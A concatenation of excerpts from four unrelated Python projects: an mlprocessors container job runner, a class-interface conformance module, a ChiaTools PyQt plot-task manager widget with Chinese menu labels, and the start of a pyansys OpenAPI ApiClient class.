processor_source_fname: raise Exception( 'inspect.getsourcefile() returned empty for processor.') if container: singularity_opts.append( '-B {}:/execute_in_container/processor_source'.format(processor_source_dirname)) # Note: in future, we do not want to mount mountaintools! This was a temp hack because I did not have wi-fi access singularity_opts.append( '-B {}:/execute_in_container/mountaintools'.format(mountaintools_source_dirname)) else: os.symlink(processor_source_dirname, tempdir+'/processor_source') # Note: in future, we do not want to mount mountaintools! This was a temp hack because I did not have wi-fi access os.symlink(mountaintools_source_dirname, tempdir+'/mountaintools') # Code generation code = """ from processor_source import {processor_class_name} def main(): {processor_class_name}.execute({expanded_kwargs}) if __name__ == "__main__": main() """ code = code.replace('{processor_class_name}', proc.__name__) code = code.replace('{expanded_kwargs}', expanded_kwargs) _write_text_file(tempdir+'/execute_in_container.py', code) if container: singularity_opts.append( '-B {}:/execute_in_container/execute_in_container.py'.format(tempdir+'/execute_in_container.py')) env_vars = [] if hasattr(proc, 'ENVIRONMENT_VARIABLES'): list = proc.ENVIRONMENT_VARIABLES for v in list: val = os.environ.get(v, '') if val: env_vars.append('{}={}'.format(v, val)) if container: singularity_opts.append('--contain') singularity_opts.append('-e') # Note: in future, we do not want to mount mountaintools! This was a temp hack because I did not have wi-fi access singularity_cmd = 'singularity exec {} {} bash -c "PYTHONPATH=/execute_in_container/mountaintools KBUCKET_CACHE_DIR=/sha1-cache {} python3 /execute_in_container/execute_in_container.py"'.format( ' '.join(singularity_opts), container, ' '.join(env_vars)) else: singularity_cmd = 'python3 {}/execute_in_container.py'.format(tempdir) if _system_call_prefix is not None: singularity_cmd = '{} {}'.format( _system_call_prefix, singularity_cmd) # singularity_cmd='bash -c "{}"'.format(singularity_cmd) retcode, console_out = _run_command_and_print_output(singularity_cmd) if retcode != 0: raise Exception('Processor returned a non-zero exit code') return console_out def _shell_execute(cmd): popen = subprocess.Popen('{}'.format(cmd), stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True, shell=True) console_output_lines = [] for stdout_line in iter(popen.stdout.readline, ""): # yield stdout_line console_output_lines.append(stdout_line) print(stdout_line, end='\r') popen.stdout.close() return_code = popen.wait() return return_code, ''.join(console_output_lines) def _run_command_and_print_output(cmd): print('RUNNING: '+cmd) return _shell_execute(cmd) def _run_command_and_print_output_old(command): print('RUNNING: '+command) with Popen(shlex.split(command), stdout=PIPE, stderr=PIPE) as process: while True: output_stdout = process.stdout.readline() output_stderr = process.stderr.readline() if (not output_stdout) and (not output_stderr) and (process.poll() is not None): break if output_stdout: print(output_stdout.decode()) if output_stderr: print(output_stderr.decode()) rc = process.poll() return rc def createJob(proc, _container=None, _cache=True, _force_run=None, _keep_temp_files=None, **kwargs): if _force_run is None: if os.environ.get('MLPROCESSORS_FORCE_RUN', '') == 'TRUE': _force_run = True else: _force_run = False if _keep_temp_files is None: if os.environ.get('MLPROCESSORS_KEEP_TEMP_FILES', '') == 'TRUE': _keep_temp_files = True else: _keep_temp_files = False if _container == 'default': if hasattr(proc, 'CONTAINER'): _container = proc.CONTAINER inputs = dict() for input0 in proc.INPUTS: name0 = input0.name if name0 not in kwargs: raise Exception('Missing input: {}'.format(name0)) fname0 = kwargs[name0] if fname0.startswith('kbucket://') or fname0.startswith('sha1://'): pass else: fname0 = os.path.abspath(fname0) if not os.path.exists(fname0): raise Exception( 'Input {} does not exist: {}'.format(name0, fname0)) if os.path.isfile(fname0): sha1_url = ca.saveFile(fname0) if not sha1_url: raise Exception( 'Problem saving input {} to kbucket ({})'.format(name0, fname0)) fname0 = sha1_url else: pass # TODO: think about how to handle directories -- probably just give a warning message inputs[name0] = fname0 outputs = dict() for output0 in proc.OUTPUTS: name0 = output0.name if name0 not in kwargs: raise Exception('Missing output: {}'.format(name0)) val0 = kwargs[name0] if type(val0) != dict: raise Exception('Type of output {} cannot be {}'.format( name0, str(type(val0)))) outputs[name0] = val0 parameters = dict() for param0 in proc.PARAMETERS: name0 = param0.name if name0 not in kwargs: if param0.optional: val0 = param0.default else: raise Exception('Missing required parameter: {}'.format(name0)) else: val0 = kwargs[name0] parameters[name0] = val0 if _container: if _container.startswith('kbucket://') or _container.startswith('sha1://'): pass else: newpath = ca.saveFile(_container) if not newpath: raise Exception('Unable to save (or upload) container file.') if not _container.startswith('sha1://'): _container = newpath processor_source_fname = inspect.getsourcefile(proc) processor_source_dirname = os.path.dirname(processor_source_fname) processor_source_basename = os.path.basename(processor_source_fname) processor_source_basename_noext = os.path.splitext( processor_source_basename)[0] code = _read_python_code_of_directory( processor_source_dirname, additional_files=getattr(proc, 'ADDITIONAL_FILES', []), exclude_init=True) code['files'].append(dict( name='__init__.py', content='from .{} import {}'.format( processor_source_basename_noext, proc.__name__) )) processor_job = dict( command='execute_mlprocessor', label='{} (version: {}) (container: {})'.format( proc.NAME, proc.VERSION, _container), processor_name=proc.NAME, processor_version=proc.VERSION, processor_class_name=proc.__name__, processor_code=ca.saveObject(code, basename='code.json'), container=_container, inputs=inputs, outputs=outputs, parameters=parameters ) if _force_run: processor_job['_force_run'] = True if _cache: processor_job['_cache'] = True if _keep_temp_files: processor_job['_keep_temp_files'] = True return processor_job _realized_containers = set() def _prepare_processor_job(job): container = job.get('container', None) if container: if container not in _realized_containers: print('realizing container: '+container) a = ca.realizeFile(path=container) if a: _realized_containers.add(container) else: raise Exception('Unable to realize
<reponame>rswgnu/rsw_interface # FILE: interface.py # # SUMMARY: Inheritable class interface/protocol support for Python; implements class `Interface' and conformance functions # USAGE: from interface import *; inherit from `Interface'; call one of the conformance functions described below # KEYWORDS: interface, utility # # AUTHOR: <NAME> # LICENSE: Available under the terms of the MIT License # # DESCRIPTION: """ See the "Interface" class documentation string for details on what interfaces are and how to use them. The following are public functions defined in this module, not methods. (They are functions since many must work on objects of any type; the ones that take operands of more specific types, such as `extends' are functions so that they may be called similarly; type checks ensure that they raise exceptions if called with an invalid argument). assert_implements(aClass) call after a class definition to assert interface conformance extends(interface, *interfaces): boolean test of whether an interface extends one or more other interfaces (via inheritance); this is false if any arg is not an interface implements(obj, *interfaces) boolean test of whether a class or instance implements one or more interfaces; this is false if any of `*interfaces' is not an interface interface_names(obj) return a list of interface names which obj: implements, if `obj' is a class or instance; extends, if `obj' is an interface the list begins with `obj' itself if it is an interface interfaces(obj) return a list of interface objects which obj: implements, if `obj' is a class or instance; extends, if `obj' is an interface the list begins with `obj' itself if it is an interface is_interface(obj) boolean test of whether `obj' is an interface or class of interface ----- ancestor_names(obj, exclude_interfaces=0) return a list of ancestor class or interface names of `obj' (class, interface or instance), including `obj' itself; ancestors are returned in depth-first order, left to right; with optional `exclude_interfaces', interface ancestors are removed ancestors(obj, exclude_interfaces=0) return a list of ancestor class or interface objects of `obj' (class, interface or instance), including `obj' itself; ancestors are returned in depth-first order, left to right; with optional `exclude_interfaces', interface ancestors are removed flatten (*objs) return a single-level list of all atomic objects in `*obj' (anything other than sequences, dictionaries and Indexable types) in original order unique(*sequences) return a flattened list with duplicates removed from any number of atomic or `sequence' args; does not sort the elements """ # DESCRIP-END. ## ------------------------------------------------------------------------ ## Required modules and version levels ## ------------------------------------------------------------------------ import sys from types import * from inspect import isclass def require_python_version(min_version): """ Raises an error if Python version is less than `min_version'. Require: `min_version' is a float or string of only digits and periods Return: python version number split into a tuple Raise: SystemError if Python version is less than `min_version'. """ assert type(min_version) in (float, str) if type(min_version) is float: # Don't use `min_version` here since has a buggy float conversion in V2.0. min_version = "%s" % min_version # python_version_tuple would be (2, 0) for 2.0 final, for example python_version_tuple = tuple(map(int, sys.version.split()[0].split('.'))) min_version_tuple = tuple(map(int, min_version.split('.'))) if python_version_tuple >= min_version_tuple: return python_version_tuple raise SystemError("(%s): Requires Python %s or greater; running Python %s" % \ (__name__, min_version, sys.version[0].split())) require_python_version('3.0.0') ## ------------------------------------------------------------------------ ## Classes ## ------------------------------------------------------------------------ class Interface: """ A protocol to which classes may conform by implementing its method signatures, pre- and post- conditions and attributes. This is the top-level class from which all interfaces inherit. An "interface" is a class which inherits from "Interface" and provides a series of "stub methods" (which may have doc strings as well as pre- and post-condition assertions). A stub method is distinguished from other methods by naming its first argument, `iself', short for "interface self". Each stub method exists to provide a calling protocol to which any "implementor" must conform. The implementor may either overload the stub method, replacing it completely or more commonly may overload its "body method", keeping the stub method's signature, doc string and pre- and post-conditions. Body method names are computed from the interface stub method name by adding a ``_body'' to the name: stub => stub_body __stub => __stub_body __stub__ => __stub_body__ At the start of each interface definition, each stub body within the class should be equated to the "Interface.error" method so that if the stub (or the stub body) is called, an exception will be signaled: stub_body1 = stub_body2 = Interface.error An interface i2 "extends" another interface i1 iff i2 inherits from i1. A class "implements" an interface (and thus conforms to it) iff: it inherits from the interface; it or its ancestors redefine/implement all of the stub or body methods declared by the interface, keeping the number of arguments per method the same and renaming the first arg of each stub method from `iself' to `self'; and its definition is followed by a call to: assert_implements(aClass) this marks the class as a non-interface and confirms that it does in fact implement the interfaces from which it inherits. """ ## Interface attributes # The next attribute is used to test whether or not a class is an interface. # Call "assert_implements(aClass)" after class definition to disable this # flag in classes which implement the interface. interface_flag = True # Interfaces set their method stub bodies to this method so that an error is # triggered if an implementor fails to redefine the stub and mistakenly calls # the stub method. def error(self, *unused): raise InterfaceError("(%s): failed to implement the above interface stub method" % self.__name__) # Define this method in each interface to prevent instantiation of interfaces. def __init__(self, *args): """ Initializes a newly created instance. The arguments passed are those from the class constructor expression. If a base class has an __init__() method, the derived class's __init__() method must explicitly call it to ensure proper initialization of the base class part of the instance. For example, "BaseClass.__init__(self, [args ...])". """ raise InterfaceError('(%s): an interface may not be instantiated; if an implementor, define "__init__" to eliminate this error' \ % self.__class__) class InterfaceError(Exception): "Class of Interface-related exceptions." def __init__(self, value=None): self.value = value def __str__(self): return repr(self.value) ## ------------------------------------------------------------------------ ## Public functions ## ------------------------------------------------------------------------ def assert_implements(aClass): """ If `aClass' fails to implement any of its interfaces, print all non-conformance issues. This should be called immediately after class definitions to validate proper interface conformance. Return: True if `aClass' implements all interfaces or if assertions are disabled (__debug__ is False) Raise: TypeError if `aClass' is not a class InterfaceError if __debug__ is enabled and `aClass' fails to conform to any of its interfaces """ # Optimize away this entire function whenever assertions are ignored, i.e. when __debug__ is False # or "python -O" is used. if not __debug__: return True # Must allow for interfaces here because `aClass' is not declared # a non-interface until the end of this method. if not (isclass(aClass) or is_interface(aClass)): raise TypeError("(assert_implements): aClass arg `%s' is not a class" % aClass) # Add all ancestor interfaces to the implementation check interface_list = interfaces(aClass) errors = [] for interface in interface_list: idict = interface.__dict__ # Set istub_tuples to interface's stub methods given as (name, method) tuples. # Remove non-stub attributes and body methods. istub_tuples = [item for item in idict.items() \ if type(item[1]) is FunctionType and \ item[1].__code__.co_varnames[0] is 'iself'] # Ensure all interface stub methods are redefined by the current class # and that the number of arguments to each remains the same. for stub_name, stub_method in istub_tuples: body_name = interface_body_name(stub_name) impl_method = getattr(aClass, stub_name) try: if hasattr(aClass, body_name): body_method = getattr(aClass, body_name) body_argcount = body_method.__code__.co_argcount else: body_method = body_argcount = None body_method_unimplemented = body_method and body_method is Interface.error \ or issubclass(interface, body_method.__class__) if impl_method is stub_method and not body_method or body_method_unimplemented: # method is not implemented errors.append("(%s): failed to define %s interface method %s or %s" % \ (aClass.__name__, interface.__name__, body_name, stub_name)) impl_method_argcount = impl_method.__code__.co_argcount stub_argcount = stub_method.__code__.co_argcount if impl_method != stub_method and impl_method_argcount != stub_argcount: # impl_method
<reponame>penglecn/ChiaTools import psutil from PyQt5.QtWidgets import QWidget, QTreeWidgetItem, QHeaderView, QProgressBar, QMessageBox, QMenu, QFileDialog from PyQt5.Qt import QBrush, QColor, QModelIndex, QTimerEvent, QCursor from PyQt5.QtCore import Qt from ui.PlotWidget import Ui_PlotWidget from config import save_config, get_config from utils import size_to_str, delta_to_str, seconds_to_str, make_name from datetime import datetime, timedelta from core.plot import PlotTask, PlotSubTask from CreatePlotDialog import CreatePlotDialog from TaskOutputDialog import TaskOutputDialog import os from subprocess import run import platform from core.plot import PlotTaskManager class PlotWidget(QWidget, Ui_PlotWidget): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.setupUi(self) self.main_window = None self.treePlot.header().setSectionResizeMode(QHeaderView.ResizeToContents) self.task_manager = PlotTaskManager() self.load_tasks() self.task_manager.signalUpdateTask.connect(self.updateTaskStatus) self.task_manager.signalMakingPlot.connect(self.onMakingPlot) self.task_manager.signalNewPlot.connect(self.onNewPlot) self.task_manager.signalNewSubTask.connect(self.onNewSubTask) self.task_manager.signalSubTaskDone.connect(self.onSubTaskDone) self.outputDialogs = [] self.treePlot.doubleClicked.connect(self.showTaskOutput) self.treePlot.expanded.connect(self.onExpanded) self.treePlot.collapsed.connect(self.onCollapsed) self.treePlot.setContextMenuPolicy(Qt.CustomContextMenu) self.treePlot.customContextMenuRequested.connect(self.showTaskMenu) self.checkBoxPhase1Limit.stateChanged.connect(self.checkPhase1Limit) self.checkBoxTotalLimit.stateChanged.connect(self.checkTotalLimit) self.checkBoxNextWhenFullyComplete.stateChanged.connect(self.checkNextWhenFullyComplete) self.checkBoxAutoDeleteOldPlot.stateChanged.connect(self.checkAutoDeleteOldPlot) self.spinBoxPhase1Count.valueChanged.connect(self.changePhase1LimitCount) self.spinBoxTotalCount.valueChanged.connect(self.changeTotalLimitCount) self.checkBoxContinueWhenFail.stateChanged.connect(self.checkContinueWhenFail) self.buttonCreatePlot.clicked.connect(self.clickCreatePlot) self.buttonCreateBatchPlots.clicked.connect(self.clickCreateBatchPlots) self.timerIdUpdateTime = self.startTimer(1000) self.timerIdSaveTasks = self.startTimer(1000 * 60) config = get_config() if 'total_limit' in config: self.checkBoxTotalLimit.setChecked(config['total_limit']) if 'phase1_limit' in config: self.checkBoxPhase1Limit.setChecked(config['phase1_limit']) if 'total_limit_count' in config: self.spinBoxTotalCount.setValue(config['total_limit_count']) else: config['total_limit_count'] = 1 if 'phase1_limit_count' in config: self.spinBoxPhase1Count.setValue(config['phase1_limit_count']) else: config['phase1_limit_count'] = 1 if 'next_when_fully_complete' in config: self.checkBoxNextWhenFullyComplete.setChecked(config['next_when_fully_complete']) if 'auto_delete_old_plot' in config: self.checkBoxAutoDeleteOldPlot.setChecked(config['auto_delete_old_plot']) if 'continue_when_fail' in config: self.checkBoxContinueWhenFail.setChecked(config['continue_when_fail']) def load_tasks(self): if self.treePlot.topLevelItemCount() == 0: for task in self.task_manager.tasks: self.addTaskItem(task) def checkPhase1Limit(self, i): config = get_config() config['phase1_limit'] = self.checkBoxPhase1Limit.isChecked() save_config() def checkTotalLimit(self, i): config = get_config() config['total_limit'] = self.checkBoxTotalLimit.isChecked() save_config() def checkNextWhenFullyComplete(self, i): config = get_config() config['next_when_fully_complete'] = self.checkBoxNextWhenFullyComplete.isChecked() save_config() def checkAutoDeleteOldPlot(self, i): config = get_config() config['auto_delete_old_plot'] = self.checkBoxAutoDeleteOldPlot.isChecked() save_config() def checkContinueWhenFail(self, i): config = get_config() config['continue_when_fail'] = self.checkBoxContinueWhenFail.isChecked() save_config() def changePhase1LimitCount(self): config = get_config() config['phase1_limit_count'] = self.spinBoxPhase1Count.value() save_config() def changeTotalLimitCount(self): config = get_config() config['total_limit_count'] = self.spinBoxTotalCount.value() save_config() def setMainWindow(self, win): self.main_window = win def timerEvent(self, event: QTimerEvent) -> None: timer = event.timerId() if timer == self.timerIdUpdateTime: self.updateTaskTimes() elif timer == self.timerIdSaveTasks: PlotTaskManager.save_tasks() def showTaskMenu(self, pos): item: QTreeWidgetItem = self.treePlot.itemAt(pos) index = self.treePlot.indexAt(pos) if not item: return if not index: return parent_item = item.parent() if parent_item: task_item = parent_item sub_task_item = item else: task_item = item sub_task_item = None task: PlotTask = task_item.data(0, Qt.UserRole) if sub_task_item: sub_task: PlotSubTask = sub_task_item.data(0, Qt.UserRole) working = sub_task.working else: sub_task: PlotSubTask = task.current_sub_task working = task.working root_item = sub_task_item is None menu = QMenu(self) action_detail = menu.addAction(u"查看日志") action_modify = None action_delete = None action_stop = None action_suspend = None action_suspend_for_30min = None action_suspend_for_1h = None action_suspend_for_2h = None action_suspend_for_3h = None action_suspend_for_4h = None action_resume = None action_priority_realtime = None action_priority_high = None action_priority_above_normal = None action_priority_normal = None action_priority_below_normal = None action_priority_idle = None action_continue = None action_next_stop = None action_locate_temp = None action_locate_temp2 = None action_clean_temp = None action_increase_number = None action_reduce_number = None action_start_immediately = None action_clear_finished = None action_export_log = None if root_item and task.specify_count: action_detail.setDisabled(True) if task.finish: if root_item: menu.addSeparator() action_modify = menu.addAction(u"编辑") if task.specify_count: action_increase_number = menu.addAction(u"增加数量") else: action_continue = menu.addAction(u"继续") menu.addSeparator() action_delete = menu.addAction(u"删除") if not task.success: if os.path.exists(task.temporary_folder): action_clean_temp = menu.addAction(u"清除临时文件") elif working: if root_item: menu.addSeparator() action_modify = menu.addAction(u"编辑") menu.addSeparator() if task.specify_count: action_increase_number = menu.addAction(u"增加数量") if task.pending_count(): action_reduce_number = menu.addAction(u"减少数量") else: action_next_stop = menu.addAction(u"下一轮任务停止") action_next_stop.setCheckable(True) action_next_stop.setChecked(task.next_stop) if not task.specify_count and task.finished_count: menu.addSeparator() action_clear_finished = menu.addAction(u"清除已完成任务") if root_item or sub_task.working: menu.addSeparator() if task.delay_remain(): action_stop = menu.addAction(u"取消") else: action_stop = menu.addAction(u"停止") if sub_task.suspend: action_resume = menu.addAction(u"继续") else: action_suspend = menu.addAction(u"暂停") menu_suspend_for = menu.addMenu(u"暂停时间") action_suspend_for_30min = menu_suspend_for.addAction(u"30分钟") action_suspend_for_1h = menu_suspend_for.addAction(u"1小时") action_suspend_for_2h = menu_suspend_for.addAction(u"2小时") action_suspend_for_3h = menu_suspend_for.addAction(u"3小时") action_suspend_for_4h = menu_suspend_for.addAction(u"4小时") menu_priority = menu.addMenu(u"优先级") action_priority_realtime = menu_priority.addAction(u"实时") action_priority_high = menu_priority.addAction(u"高") action_priority_above_normal = menu_priority.addAction(u"高于普通") action_priority_normal = menu_priority.addAction(u"普通") action_priority_below_normal = menu_priority.addAction(u"低于普通") action_priority_idle = menu_priority.addAction(u"空闲") priority = sub_task.worker.priority current_priority_action = action_priority_normal if priority == psutil.REALTIME_PRIORITY_CLASS: current_priority_action = action_priority_realtime elif priority == psutil.HIGH_PRIORITY_CLASS: current_priority_action = action_priority_high elif priority == psutil.ABOVE_NORMAL_PRIORITY_CLASS: current_priority_action = action_priority_above_normal elif priority == psutil.BELOW_NORMAL_PRIORITY_CLASS: current_priority_action = action_priority_below_normal elif priority == psutil.IDLE_PRIORITY_CLASS: current_priority_action = action_priority_idle current_priority_action.setCheckable(True) current_priority_action.setChecked(True) else: if root_item: menu.addSeparator() remain = task.delay_remain() if remain: action_start_immediately = menu.addAction(u'立即开始') action_delete = menu.addAction(u"删除") if sub_task_item and sub_task.finish: menu.addSeparator() action_export_log = menu.addAction(u"导出日志") elif not sub_task_item and task.finish: menu.addSeparator() action_export_log = menu.addAction(u"导出所有日志") if os.path.exists(task.temporary_folder) and platform.system() == 'Windows': menu.addSeparator() action_locate_temp = menu.addAction(u"浏览临时文件") if task.temporary2_folder: action_locate_temp2 = menu.addAction(u"浏览第二临时文件") action = menu.exec(QCursor.pos()) if action is None: return if action == action_detail: self.showTaskOutput(index) elif action == action_export_log: if sub_task_item and sub_task.finish: log_file = '' if sub_task.plot_file: log_file = os.path.splitext(os.path.basename(sub_task.plot_file))[0] + '.log' log_file = QFileDialog.getSaveFileName(self, '导出日志', log_file, '日志文件 (*.log *.txt)')[0] if not log_file: return if not self.exportSubTaskLog(sub_task, log_file=log_file): QMessageBox.information(self, '提示', f'导出文件失败 {log_file}') return elif not sub_task_item and task.finish: folder = QFileDialog.getExistingDirectory(self, '导出所有日志') if not folder: return for _sub_task in task.sub_tasks: if _sub_task.plot_file: log_name = os.path.splitext(os.path.basename(sub_task.plot_file))[0] + '.log' else: log_name = make_name(12) + '.log' log_file = os.path.join(folder, log_name) if not self.exportSubTaskLog(_sub_task, log_file=log_file): QMessageBox.information(self, '提示', f'导出文件失败 {log_file}') return elif action == action_modify: dlg = CreatePlotDialog(task=task) if dlg.exec() == dlg.rejected: return self.task_manager.save_tasks() self.updateTaskItem(item, task) for sub in task.sub_tasks: _sub_item = self.getSubItemFromSubTask(item, sub) if _sub_item: self.updateSubTaskItem(_sub_item, sub) elif action == action_delete: all_files, total_size, temp_plot_size = task.get_temp_files() if temp_plot_size: if QMessageBox.information(self, '提示', f"检测到临时目录下存在未完成移动的plot文件(.plot.2.tmp),大小{size_to_str(temp_plot_size)},建议手动把该文件改名为.plot后移动到最终目录。\n\n确定要删除吗?", QMessageBox.Ok | QMessageBox.Cancel) == QMessageBox.Cancel: return if len(all_files): if QMessageBox.information(self, '提示', f"确定要删除临时目录吗?\n{len(all_files)}个文件\n{size_to_str(total_size)}GB", QMessageBox.Ok | QMessageBox.Cancel) == QMessageBox.Cancel: return if os.path.exists(task.temporary_folder) and not task.remove_temp_folder(): QMessageBox.warning(self, '提示', '清除临时目录失败!') return if sub_task and sub_task.worker: sub_task.worker.stop() self.treePlot.takeTopLevelItem(index.row()) self.task_manager.remove_task(task) elif action == action_clear_finished: for sub in task.sub_tasks[:]: if sub.finish: _sub_item = self.getSubItemFromSubTask(item, sub) if _sub_item: item.removeChild(_sub_item) task.remove_sub_task(sub) if len(task.sub_tasks) <= 1: break elif action == action_stop: if QMessageBox.information(self, '提示', "确定要停止任务吗?停止后无法恢复", QMessageBox.Ok | QMessageBox.Cancel) == QMessageBox.Cancel: return if sub_task_item: sub_task.worker.stop() else: including_copying = False for sub in task.sub_tasks: if sub.working and sub.worker and sub.worker.copying: msg = QMessageBox(QMessageBox.Information, '提示', "要将正在生成文件的任务停止吗?", QMessageBox.Yes | QMessageBox.No | QMessageBox.Cancel) msg.button(QMessageBox.Yes).setText('是') msg.button(QMessageBox.No).setText('否') answer = msg.exec() if answer == QMessageBox.Cancel: return elif answer == QMessageBox.Yes: including_copying = True break for sub in task.sub_tasks: if sub.working: if sub.worker and sub.worker.copying and not including_copying: continue sub.worker.stop() elif action == action_suspend: if sub_task_item: sub_task.worker.suspend() else: for sub in task.sub_tasks: if sub.working and not sub.worker.copying: sub.worker.suspend() elif action == action_suspend_for_30min: time_for_suspend = 60*30 if sub_task_item: sub_task.worker.suspend(time_for_suspend) else: for sub in task.sub_tasks: if sub.working and not sub.worker.copying: sub.worker.suspend(time_for_suspend) elif action == action_suspend_for_1h: time_for_suspend = 60*60*1 if sub_task_item: sub_task.worker.suspend(time_for_suspend) else: for sub in task.sub_tasks: if sub.working and not sub.worker.copying: sub.worker.suspend(time_for_suspend) elif action == action_suspend_for_2h: time_for_suspend = 60*60*2 if sub_task_item: sub_task.worker.suspend(time_for_suspend) else: for sub in task.sub_tasks: if sub.working and not sub.worker.copying: sub.worker.suspend(time_for_suspend) elif action == action_suspend_for_3h: time_for_suspend = 60*60*3 if sub_task_item: sub_task.worker.suspend(time_for_suspend) else: for sub in task.sub_tasks: if sub.working and not sub.worker.copying: sub.worker.suspend(time_for_suspend) elif action == action_suspend_for_4h: time_for_suspend = 60*60*4 if sub_task_item: sub_task.worker.suspend(time_for_suspend) else: for sub in task.sub_tasks: if sub.working and not sub.worker.copying: sub.worker.suspend(time_for_suspend) elif action == action_resume: if sub_task_item: sub_task.worker.resume() else: for sub in task.sub_tasks: if sub.working: sub.worker.resume() elif action == action_priority_realtime: task.priority = psutil.REALTIME_PRIORITY_CLASS if sub_task.working and sub_task.worker: sub_task.worker.priority = psutil.REALTIME_PRIORITY_CLASS elif action == action_priority_high: task.priority = psutil.HIGH_PRIORITY_CLASS if sub_task.working and sub_task.worker: sub_task.worker.priority = psutil.HIGH_PRIORITY_CLASS elif action == action_priority_above_normal: task.priority = psutil.ABOVE_NORMAL_PRIORITY_CLASS if sub_task.working and sub_task.worker: sub_task.worker.priority = psutil.ABOVE_NORMAL_PRIORITY_CLASS elif action == action_priority_normal: task.priority = psutil.NORMAL_PRIORITY_CLASS if sub_task.working and sub_task.worker: sub_task.worker.priority = psutil.NORMAL_PRIORITY_CLASS elif action == action_priority_below_normal: task.priority = psutil.BELOW_NORMAL_PRIORITY_CLASS if sub_task.working and sub_task.worker: sub_task.worker.priority = psutil.BELOW_NORMAL_PRIORITY_CLASS elif action == action_priority_idle: task.priority = psutil.IDLE_PRIORITY_CLASS if sub_task.working and sub_task.worker: sub_task.worker.priority = psutil.IDLE_PRIORITY_CLASS elif action == action_continue: if task.finish: task.next_stop = False task.do_next(check_able_to_next=False) elif action == action_next_stop: task.next_stop = not task.next_stop elif action == action_locate_temp: folder = task.temporary_folder.replace('/', '\\') run('explorer /select, ' + folder) elif action == action_locate_temp2: folder = task.temporary2_folder.replace('/', '\\') run('explorer /select, ' + folder) elif action == action_clean_temp: all_files, total_size, temp_plot_size = task.get_temp_files() if temp_plot_size: if QMessageBox.information(self, '提示', f"检测到临时目录下存在未完成移动的plot文件(.plot.2.tmp),大小{size_to_str(temp_plot_size)},建议手动把该文件改名为.plot后移动到最终目录。\n\n确定要删除吗?", QMessageBox.Ok | QMessageBox.Cancel) == QMessageBox.Cancel: return if len(all_files) == 0: QMessageBox.information(self, '提示', '没有临时文件') return if QMessageBox.information(self, '提示', f"确定要清除临时文件吗?\n{len(all_files)}个文件\n{size_to_str(total_size)}GB", QMessageBox.Ok | QMessageBox.Cancel) == QMessageBox.Cancel: return if not task.delete_temp_files(): QMessageBox.warning(self, '提示', '清除临时文件失败!') elif action == action_increase_number: finished = task.finish sub_task = task.increase() self.addSubTaskItem(item, sub_task) if finished: task.do_next() return elif action == action_reduce_number: sub_task = task.sub_tasks[-1] if sub_task.finish or sub_task.working: return self.removeSubTaskItem(item, sub_task) task.reduce() elif action == action_start_immediately: if task.delay_remain(): task.delay_seconds = 0 if not sub_task_item: sub_task_item = self.getSubItemFromSubTask(item, sub_task) if sub_task_item: self.updateSubTaskItem(sub_task_item, sub_task) def exportSubTaskLog(self, sub_task: PlotSubTask, log_file): try: f = open(log_file, 'w') if not f: return for log in sub_task.log: f.write(log + '\n') f.close() return True except: return False def onExpanded(self,
<reponame>pyansys/openapi-common import datetime import mimetypes import json import os import re import tempfile from types import ModuleType from dateutil.parser import parse from typing import Dict, Union, List, Tuple, Type, Optional, Any, Callable from urllib.parse import quote import requests from requests.structures import CaseInsensitiveDict from ._util import ( SessionConfiguration, handle_response, ) from ._base import ( PrimitiveType, DeserializedType, SerializedType, ModelBase, ApiClientBase, ) from ._exceptions import ApiException # noinspection DuplicatedCode class ApiClient(ApiClientBase): """Provides a generic API client for OpenAPI client library builds. This client handles client-server communication and is invariant across implementations. Specifics of the methods and models for each application are generated from OpenAPI templates and are responsible for interfacing with the public API exposed by the client. Parameters ---------- session : requests.Session Base session object that the API client is to use. api_url : str Base URL for the API. All generated endpoint URLs are relative to this address. configuration : SessionConfiguration Configuration options for the API client. Examples -------- >>> client = ApiClient(requests.Session(), ... 'http://my-api.com/API/v1.svc', ... SessionConfiguration()) ... <ApiClient url: http://my-api.com/API/v1.svc> For testing purposes, it is common to configure an API with a self-signed certificate. By default, the :class:`ApiClient` class will not trust self-signed SSL certificates. To allow this, pass a path to the root certificate to the :class:`SessionConfiguration` object. For more configuration examples, see :class:`SessionConfiguration`. >>> session_config = SessionConfiguration(cert_store_path='./self-signed-cert.pem') ... ssl_client = ApiClient(requests.Session(), ... 'https://secure-api/API/v1.svc', ... session_config) ... ssl_client <ApiClient url: https://secure-api/API/v1.svc> """ PRIMITIVE_TYPES = (float, bool, bytes, str, int) NATIVE_TYPES_MAPPING = { "int": int, "bytes": bytes, "float": float, "str": str, "bool": bool, "date": datetime.date, "datetime": datetime.datetime, } def __init__( self, session: requests.Session, api_url: str, configuration: SessionConfiguration, ): self.models: Dict[str, Type[ModelBase]] = {} self.api_url = api_url self.rest_client = session self.configuration = configuration def __repr__(self) -> str: return f"<ApiClient url: {self.api_url}>" def setup_client(self, models: ModuleType) -> None: """Set up the client for use and register models for serialization and deserialization. This step must be completed prior to using the :class:`ApiClient` class. Parameters ---------- models : ModuleType Module containing models generated by the Swagger code generator tool. Examples -------- >>> client = ApiClient(requests.Session(), ... 'http://my-api.com/API/v1.svc', ... SessionConfiguration()) ... import ApiModels as model_module ... client.setup_client(model_module) """ self.models = models.__dict__ def __call_api( self, resource_path: str, method: str, path_params: Union[Dict[str, Union[str, int]], List[Tuple], None] = None, query_params: Union[Dict[str, Union[str, int]], List[Tuple], None] = None, header_params: Union[Dict[str, Union[str, int]], None] = None, body: Optional[Any] = None, post_params: Optional[Any] = None, files: Optional[Any] = None, response_type: Optional[str] = None, _return_http_data_only: Optional[bool] = None, collection_formats: Optional[Dict[str, str]] = None, _preload_content: bool = True, _request_timeout: Optional[Union[float, Tuple[float]]] = None, ) -> Union[requests.Response, DeserializedType, None]: # header parameters header_params = header_params or {} if header_params: header_params_sanitized = self.sanitize_for_serialization(header_params) header_params = dict( self.parameters_to_tuples(header_params_sanitized, collection_formats) ) # path parameters if path_params: resource_path = self.__handle_path_params( resource_path, path_params, collection_formats ) # query parameters query_params_str = "" if query_params: query_params_str = self.__handle_query_params( query_params, collection_formats ) # post parameters if post_params or files: post_params = self.prepare_post_parameters(post_params, files) post_params = self.sanitize_for_serialization(post_params) post_params = self.parameters_to_tuples(post_params, collection_formats) # body if body: body = self.sanitize_for_serialization(body) if isinstance(body, (list, dict)): body = json.dumps(body).encode("utf8") # request url url = self.api_url + resource_path # perform request and return response response_data = self.request( method, url, query_params=query_params_str, headers=header_params, post_params=post_params, body=body, _preload_content=_preload_content, _request_timeout=_request_timeout, ) self.last_response = response_data return_data: Union[requests.Response, DeserializedType, None] = response_data if _preload_content: # deserialize response data if response_type: 